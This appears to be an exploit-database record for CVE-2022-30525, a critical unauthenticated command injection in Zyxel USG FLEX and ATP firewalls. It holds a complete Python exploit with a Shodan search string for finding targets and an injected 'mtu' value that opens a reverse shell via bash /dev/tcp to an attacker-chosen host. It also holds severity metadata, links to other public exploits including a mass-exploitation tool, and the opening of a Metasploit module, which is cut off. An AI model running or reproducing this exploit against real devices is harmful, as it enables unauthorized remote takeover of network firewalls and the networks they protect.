DATABASE RESOURCES PRICING ABOUT US

{"id": "PACKETSTORM:167372", "vendorId": null, "type": "packetstorm", "bulletinFamily": "exploit", "title": "Zyxel USG FLEX 5.21 Command Injection", "description": "", "published": "2022-06-03T00:00:00", "modified": "2022-06-03T00:00:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 10.0}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://packetstormsecurity.com/files/167372/Zyxel-USG-FLEX-5.21-Command-Injection.html", "reporter": "Valentin Lobstein", "references": [], "cvelist": ["CVE-2022-30525"], "immutableFields": [], "lastseen": "2022-06-03T16:26:23", "viewCount": 47, "enchantments": {"vulnersScore": "PENDING"}, "_state": {}, "_internal": {}, "sourceHref": "https://packetstormsecurity.com/files/download/167372/zyxelusgflex521-exec.txt", "sourceData": "`# Exploit Title: Zyxel USG FLEX 5.21 - OS Command Injection \n# Shodan Dork: title:\"USG FLEX 100\" title:\"USG FLEX 100W\" title:\"USG FLEX 200\" title:\"USG FLEX 500\" title:\"USG FLEX 700\" title:\"USG20-VPN\" title:\"USG20W-VPN\" title:\"ATP 100\" title:\"ATP 200\" title:\"ATP 500\" title:\"ATP 700\" title:\"ATP 800\" \n# Date: May 18th 2022 \n# Exploit Author: Valentin Lobstein \n# Vendor Homepage: https://www.zyxel.com \n# Version: ZLD5.00 thru ZLD5.21 \n# Tested on: Linux \n# CVE: CVE-2022-30525 \n \n \nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning \nimport sys \nimport json \nimport base64 \nimport requests \nimport argparse \n \n \nparser = argparse.ArgumentParser( \nprog=\"CVE-2022-30525.py\", \ndescription=\"Example : python3 %(prog)s -u https://google.com -r 127.0.0.1 -p 4444\", \n) \nparser.add_argument(\"-u\", dest=\"url\", help=\"Specify target URL\") \nparser.add_argument(\"-r\", dest=\"host\", help=\"Specify Remote host\") \nparser.add_argument(\"-p\", dest=\"port\", help=\"Specify Remote port\") \n \nargs = parser.parse_args() \n \nbanner = ( \n\"ICwtLiAuICAgLCAsLS0uICAgICAsLS4gICAsLS4gICwtLiAgLC0uICAgICAgLC0tLCAgLC0uICA7\" \n\"LS0nICwtLiAgOy0tJyAKLyAgICB8ICAvICB8ICAgICAgICAgICApIC8gIC9cICAgICkgICAgKSAg\" \n\"ICAgICAvICAvICAvXCB8ICAgICAgICkgfCAgICAKfCAgICB8IC8gICB8LSAgIC0tLSAgIC8gIHwg\" \n\"LyB8ICAgLyAgICAvICAtLS0gIGAuICB8IC8gfCBgLS4gICAgLyAgYC0uICAKXCAgICB8LyAgICB8\" \n\"ICAgICAgICAgLyAgIFwvICAvICAvICAgIC8gICAgICAgICAgKSBcLyAgLyAgICApICAvICAgICAg\" \n\"KSAKIGAtJyAnICAgICBgLS0nICAgICAnLS0nICBgLScgICctLScgJy0tJyAgICAgYC0nICAgYC0n\" \n\"ICBgLScgICctLScgYC0nICAKCVJldnNoZWxscwkoQ3JlYXRlZCBCeSBWYWxlbnRpbiBMb2JzdGVp\" \n\"biA6KSApCg==\" \n) \n \n \ndef main(): \n \nprint(\"\\n\" + base64.b64decode(banner).decode(\"utf-8\")) \n \nif None in vars(args).values(): \nprint(f\"[!] Please enter all parameters !\") \nparser.print_help() \nsys.exit() \n \nif \"http\" not in args.url: \nargs.url = \"https://\" + args.url \nargs.url += \"/ztp/cgi-bin/handler\" \nexploit(args.url, args.host, args.port) \n \n \ndef exploit(url, host, port): \nheaders = { \n\"User-Agent\": \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0\", \n\"Content-Type\": \"application/json\", \n} \n \ndata = { \n\"command\": \"setWanPortSt\", \n\"proto\": \"dhcp\", \n\"port\": \"4\", \n\"vlan_tagged\": \"1\", \n\"vlanid\": \"5\", \n\"mtu\": f'; bash -c \"exec bash -i &>/dev/tcp/{host}/{port}<&1;\";', \n\"data\": \"hi\", \n} \nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning) \nprint(f\"\\n[!] Trying to exploit {args.url.replace('/ztp/cgi-bin/handler','')}\") \n \ntry: \nresponse = requests.post( \nurl=url, headers=headers, data=json.dumps(data), verify=False, timeout=5 \n) \nexcept (KeyboardInterrupt, requests.exceptions.Timeout): \nprint(\"[!] Bye Bye hekcer !\") \nsys.exit(1) \nfinally: \n \ntry: \nprint(\"[!] Can't exploit the target ! Code :\", response.status_code) \n \nexcept: \nprint(\"[!] Enjoy your shell !!!\") \n \n \nif __name__ == \"__main__\": \nmain() \n \n`\n"}

{"checkpoint_advisories": [{"lastseen": "2022-05-23T19:29:59", "description": "A command injection vulnerability exists in Zyxel USG. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary commands on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-19T00:00:00", "type": "checkpoint_advisories", "title": "Zyxel USG Command Injection (CVE-2022-30525)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30525"], "modified": "2022-05-19T00:00:00", "id": "CPAI-2022-0251", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "attackerkb": [{"lastseen": "2022-06-03T19:56:50", "description": "A OS command injection vulnerability in the CGI program of Zyxel USG FLEX 100(W) firmware versions 5.00 through 5.21 Patch 1, USG FLEX 200 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 500 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 700 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 50(W) firmware versions 5.10 through 5.21 Patch 1, USG20(W)-VPN firmware versions 5.10 through 5.21 Patch 1, ATP series firmware versions 5.10 through 5.21 Patch 1, VPN series firmware versions 4.60 through 5.21 Patch 1, which could allow an attacker to modify specific files and then execute some OS commands on a vulnerable device.\n\n \n**Recent assessments:** \n \n**jbaines-r7** at May 12, 2022 1:49pm UTC reported:\n\nThis vulnerability is an easy to exploit unauthenticated and remote OS command injection vulnerability. Please see the Rapid7 analysis for details.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-12T00:00:00", "type": "attackerkb", "title": "CVE-2022-30525", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30525"], "modified": "2022-05-12T00:00:00", "id": "AKB:0A065587-D7DE-4680-8C87-7E1C998210BC", "href": "https://attackerkb.com/topics/LbcysnvxO2/cve-2022-30525", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "githubexploit": [{"lastseen": "2022-06-13T22:57:03", "description": "## CVE-2022-30525 (Zyxel Firewall Remote Command Injection)\nA py...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-13T21:11:54", "type": "githubexploit", "title": "Exploit for OS Command Injection in Zyxel Usg Flex 100W Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30525"], "modified": "2022-06-13T21:23:53", "id": "0A536389-CEE0-5E64-89BE-1A54E16285BE", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-05-23T17:02:41", "description": "# CVE-2022-30525\n####...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-15T06:20:06", "type": "githubexploit", "title": "Exploit for OS Command Injection in Zyxel Usg Flex 100W Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30525"], "modified": "2022-05-15T06:24:15", "id": "A32ADBBF-016F-5C40-97B7-16216D138452", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-06-04T05:01:59", "description": "# Victorian Machinery\n\nVictorian Machinery is a proof of concept...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-10T10:31:19", "type": "githubexploit", "title": "Exploit for OS Command Injection in Zyxel Usg Flex 100W Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30525"], "modified": "2022-06-04T03:10:37", "id": "DFE57B9E-96F5-564C-BD64-C3D58C9DB15D", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-06-13T15:27:02", "description": "# CVE-2022-30525\nZyxel \u9632\u706b\u5899\u8fdc\u7a0b\u547d\u4ee4\u6ce8\u5165\u6f0f\u6d1e\uff08CVE-2022-30525\uff09\n\n\n# Optional ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-13T12:03:28", "type": "githubexploit", "title": "Exploit for OS Command Injection in Zyxel Usg Flex 100W Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30525"], "modified": "2022-06-13T09:29:09", "id": "AD317F0A-2E09-54B8-A027-2E9FB07658F6", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-05-24T07:15:43", "description": "# CVE-2022-30525\nCVE-2022-30525 POC exploit\n\n# Usage \n```shell\nu...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-16T09:15:43", "type": "githubexploit", "title": "Exploit for OS Command Injection in Zyxel Usg Flex 100W Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30525"], "modified": "2022-05-24T05:41:44", "id": "5C5D6632-39BD-58FA-BE17-3AD7021DD8EE", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-06-13T01:58:33", "description": "# CVE-2022-30525\nA OS Command Injection Vulnerability in the CGI...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-12T19:04:41", "type": "githubexploit", "title": "Exploit for OS Command Injection in Zyxel Usg Flex 100W Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30525"], "modified": "2022-06-12T19:13:13", "id": "D1D08792-13CE-5DC6-B23F-F93330D78E39", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-05-23T17:02:47", "description": "# CVE-2022-30525\nZyxel \u9632\u706b\u5899\u672a\u7ecf\u8eab\u4efd\u9a8c\u8bc1\u7684\u8fdc\u7a0b\u547d\u4ee4\u6ce8\u5165\n\n## \u5f71\u54cd\u7248\u672c\n\n### \u5f71\u54cd\u7ec4\u4ef6\n\nUSG ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-13T18:16:31", "type": "githubexploit", "title": "Exploit for OS Command Injection in Zyxel Usg Flex 100W Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30525"], "modified": "2022-05-16T02:50:15", "id": "85E31D02-8EDA-5C9D-BF05-D41E04B2F6A6", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-05-24T15:40:51", "description": "# CVE-2022-30525 by 1vere$k\n**Rapid7** discovered and reported a...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-23T16:51:42", "type": "githubexploit", "title": "Exploit for OS Command Injection in Zyxel Usg Flex 100W Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30525"], "modified": "2022-05-24T13:23:56", "id": "4CA250E4-177A-50FF-AB65-51C71DE1DCA0", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-05-30T14:10:27", "description": "# CVE-2022-30525 Zyxel \u9632\u706b\u5899\u547d\u4ee4\u6ce8\u5165\u6f0f\u6d1e\n\nCVE-2022-30525 POC&EXP \n\nauth...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-28T07:19:31", "type": "githubexploit", "title": "Exploit for OS Command Injection in Zyxel Usg Flex 100W Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30525"], "modified": "2022-05-29T14:38:48", "id": "6F26932E-1981-5C9F-B4CA-E98F18769C2F", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-06-24T08:14:47", "description": "# CVE-2022-30525\nZyxel \u9632\u706b\u5899\u8fdc\u7a0b\u547d\u4ee4\u6ce8\u5165\u6f0f\u6d1e\uff08CVE-2022-30525\uff09\u6279...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-13T12:58:43", "type": "githubexploit", "title": "Exploit for OS Command Injection in Zyxel Usg Flex 100W Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30525"], "modified": "2022-06-24T06:27:15", "id": "4504BF56-50B9-5F14-BA98-57209CC80328", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-05-24T01:10:15", "description": "# CVE-2022-30525\n\nZyxel \u9632\u706b\u5899\u672a\u7ecf\u8eab\u4efd\u9a8c\u8bc1\u7684\u8fdc\u7a0b\u547d\u4ee4\u6ce8\u5165\u6f0f\u6d1e\n\n## \u5f71\u54cd\u7ec4\u4ef6\nUSG FLEX 100...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-16T04:45:43", "type": "githubexploit", "title": "Exploit for OS Command Injection in Zyxel Usg Flex 100W Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30525"], "modified": "2022-05-19T10:30:01", "id": "FBDACF27-8CBC-534F-9BB8-EFEF692738E0", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-05-23T17:00:09", "description": "# CVE-2022-30525-mass\nzyxel firewall unauthenticated rce mass mu...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-18T12:10:11", "type": "githubexploit", "title": "Exploit for OS Command Injection in Zyxel Usg Flex 100W Firmware", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30525"], "modified": "2022-05-18T12:21:33", "id": "AFD45BD2-75E5-571A-865F-A4AEDEB3E36F", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}], "packetstorm": [{"lastseen": "2022-05-16T15:02:03", "description": "", "cvss3": {}, "published": "2022-05-16T00:00:00", "type": "packetstorm", "title": "Zyxel Firewall ZTP Unauthenticated Command Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-30525"], "modified": "2022-05-16T00:00:00", "id": "PACKETSTORM:167182", "href": "https://packetstormsecurity.com/files/167182/Zyxel-Firewall-ZTP-Unauthenticated-Command-Injection.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::CmdStager \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Zyxel Firewall ZTP Unauthenticated Command Injection', \n'Description' => %q{ \nThis module exploits CVE-2022-30525, an unauthenticated remote \ncommand injection vulnerability affecting Zyxel firewalls with zero \ntouch provisioning (ZTP) support. By sending a malicious setWanPortSt \ncommand containing an mtu field with a crafted OS command to the \n/ztp/cgi-bin/handler 